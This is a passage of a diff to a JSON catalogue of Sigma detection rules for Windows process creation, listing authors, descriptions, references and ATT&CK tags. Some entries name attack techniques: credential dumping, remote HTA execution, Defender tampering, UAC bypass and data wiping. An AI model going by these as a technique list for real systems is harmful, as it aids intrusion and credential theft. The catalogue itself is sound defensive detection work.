"value": "Mouse Lock Credential Gathering" - }, - { - "description": "Detects file execution using the msdeploy.exe lolbin", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_msdeploy.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", - "https://twitter.com/pabraeken/status/995837734379032576", - "https://twitter.com/pabraeken/status/999090532839313408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" - ], - "tags": [ - "attack.execution", "attack.t1218" ] }, - "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "value": "Execute Files with Msdeploy.exe" + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE" }, { - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects a suspicious script executions from temporary folder", "meta": { - "author": "Nasreddine Bencherchali (rule)", - "creation_date": "2022/05/29", + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "creation_date": "2021/07/14", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": 
"a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder" + }, + { + "description": "Detects suspicious FromBase64String expressions in command line arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/29", + "falsepositive": [ + "Administrative script libraries" + ], + "filename": "proc_creation_win_powershell_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ] + }, + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/20", + "falsepositive": [ + "Legitimate use of AnyDesk from a non-standard folder" + ], + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder" + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_msdt.yml", + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://twitter.com/_JohnHammond/status/1531672601067675648", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "value": "Execute Arbitrary Commands Using MSDT.EXE" - }, - { - "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", - "meta": { - "author": "GossiTheDog (rule), frack113 (sigma version)", - 
"creation_date": "2022/06/09", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "filename": "proc_creation_win_msdt_diagcab.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", - "value": "Execute MSDT.EXE Using Diagcab File" - }, - { - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "value": "MSDT.EXE Execution With Suspicious Cab Option" - }, - { - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "meta": { - "author": "Nextron Systems", - 
"creation_date": "2022/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_msdt_susp_parent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" ], "tags": [ "attack.defense_evasion", "attack.t1036", - "attack.t1218" + "attack.t1003.001" ] }, - "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", - "value": "MSDT Executed with Suspicious Parent" - }, - { - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" - ], - "filename": "proc_creation_win_msedge_minimized_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", - "value": "Suspicious Minimized MSEdge Start" - }, - { - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted 
malicious hta file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mshta_http.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" - ] - }, - "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", - "value": "Mshta Remotely Hosted HTA File Execution" - }, - { - "description": "Identifies suspicious mshta.exe commands.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mshta_javascript.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ] - }, - "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", - "value": "Mshta JavaScript Execution" + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump" }, { "description": "Detects a Windows command line executable started from MSHTA", 
@@ -42720,209 +34666,1030 @@ "value": "MSHTA Spawning Windows Shell" }, { - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", "meta": { "author": "frack113", - "creation_date": "2022/04/24", + "creation_date": "2021/12/26", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_msiexec_dll.yml", + "filename": "proc_creation_win_susp_cipher.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.impact", + "attack.t1485" ] }, - "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", - "value": "Suspicious Msiexec Load DLL" + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher" }, { - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "meta": { - "author": "frack113", - "creation_date": "2022/04/16", - 
"falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_msiexec_embedding.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" - ], - "tags": [ - "attack.t1218.007", - "attack.defense_evasion" - ] - }, - "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", - "value": "Suspicious MsiExec Embedding Parent" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_msiexec_execute_dll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "value": "Suspicious Msiexec Execute Arbitrary DLL" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", 
- "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_msiexec_install_quiet.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "value": "Suspicious Msiexec Quiet Install" - }, - { - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/28", + "creation_date": "2022/06/16", "falsepositive": [ - "Unknown" + "Legitimate use of PsService by an administrator" ], - "filename": "proc_creation_win_msiexec_install_remote.yml", + "filename": "proc_creation_win_sysinternals_psservice.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" ], "tags": [ - 
"attack.defense_evasion", - "attack.t1218.007" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ] }, - "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", - "value": "Suspicious Msiexec Quiet Install From Remote Location" + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService" }, { - "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "meta": { - "author": "Alexander McDonald", - "creation_date": "2022/06/24", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/12/27", "falsepositive": [ - "Legitimate use of Msra.exe" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], - "filename": "proc_creation_win_msra_process_injection.yml", + "filename": "proc_creation_win_susp_download_office_domain.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] + "tags": "No established tags" }, - "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", - "value": "Msra.exe Process Injection" + "uuid": 
"00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain" }, { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", "meta": { - "author": "frack113", - "creation_date": "2022/01/07", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", "falsepositive": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Unknown" ], - "filename": "proc_creation_win_mstsc.yml", + "filename": "proc_creation_win_persistence_typed_paths.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence" ] }, - "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "value": "Remote Desktop Protocol Use Mstsc" + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine" }, { - "description": "Detects multiple suspicious process in a limited timeframe", + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as 
Microsoft Defender ATP queries", "meta": { - "author": "juju4", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2021/01/22", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "filename": "proc_creation_win_multiple_susp_cli.yml", + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "value": "UNC2452 Process Creation Patterns" + }, + { + "description": "Detects reg command lines that disable certain important features of Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Rare legitimate use by administrators to test software (should always be investigated)" + ], + "filename": "proc_creation_win_reg_defender_tampering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", + "value": "Registry Defender Tampering" + }, + { + "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload 
when the service is started or killed as a method of persistence.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ] + }, + "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", + "value": "Modification Of Existing Services For Persistence" + }, + { + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_defaultpack.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", + "https://www.echotrail.io/insights/search/defaultpack.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "b2309017-4235-44fe-b5af-b15363011957", + "value": "Lolbin Defaultpack.exe Use As Proxy" + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2019/08/24",
+ "falsepositive": [
+ "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962"
+ ],
+ "filename": "proc_creation_win_susp_csc_folder.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
+ "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
+ "https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027.004"
+ ]
+ },
+ "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4",
+ "value": "Suspicious Csc.exe Source File Folder"
+ },
+ {
+ "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_installutil_download.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/LOLBAS-Project/LOLBAS/pull/239",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc",
+ "value": "Suspicious Execution of InstallUtil To Download"
+ },
+ {
+ "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/24",
+ "falsepositive": [
+ "Very unlikely"
+ ],
+ "filename": "proc_creation_win_hack_inveigh.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://github.com/Kevin-Robertson/Inveigh",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0",
+ "value": "Inveigh Hack Tool"
+ },
+ {
+ "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
+ "meta": {
+ "author": "Tim Burrell",
+ "creation_date": "2020/02/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_apt_gallium.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1212",
+ "attack.command_and_control",
+ "attack.t1071"
+ ]
+ },
+ "uuid": "18739897-21b1-41da-8ee4-5b786915a676",
+ "value": "GALLIUM Artefacts"
+ },
+ {
+ "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/08/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_apt_mercury.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.g0069"
+ ]
+ },
+ "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d",
+ "value": "MERCURY Command Line Patterns"
+ },
+ {
+ "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/11/26",
+ "falsepositive": [
+ "Very Possible"
+ ],
+ "filename": "proc_creation_win_lolbin_diantz_ads.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Diantz/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ 
"attack.t1564.004"
+ ]
+ },
+ "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd",
+ "value": "Suspicious Diantz Alternate Data Stream Execution"
+ },
+ {
+ "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook",
+ "meta": {
+ "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team",
+ "creation_date": "2022/02/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_outlook_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
+ "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204.002"
+ ]
+ },
+ "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d",
+ "value": "Microsoft Outlook Product Spawning Windows Shell"
+ },
+ {
+ "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata",
+ "meta": {
+ "author": "Christian Burkard, Florian Roth",
+ "creation_date": "2021/08/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/hfiref0x/UACME",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002"
+ ]
+ },
+ "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177",
+ "value": "UAC Bypass Tool UACMe Akagi"
+ },
+ {
+ "description": "Detects Obfuscated use of Clip.exe to execute PowerShell",
+ "meta": {
+ "author": "Jonathan Cheong, 
oscd.community",
+ "creation_date": "2020/10/13",
+ "falsepositive": [
+ "Unknown"
+ ],
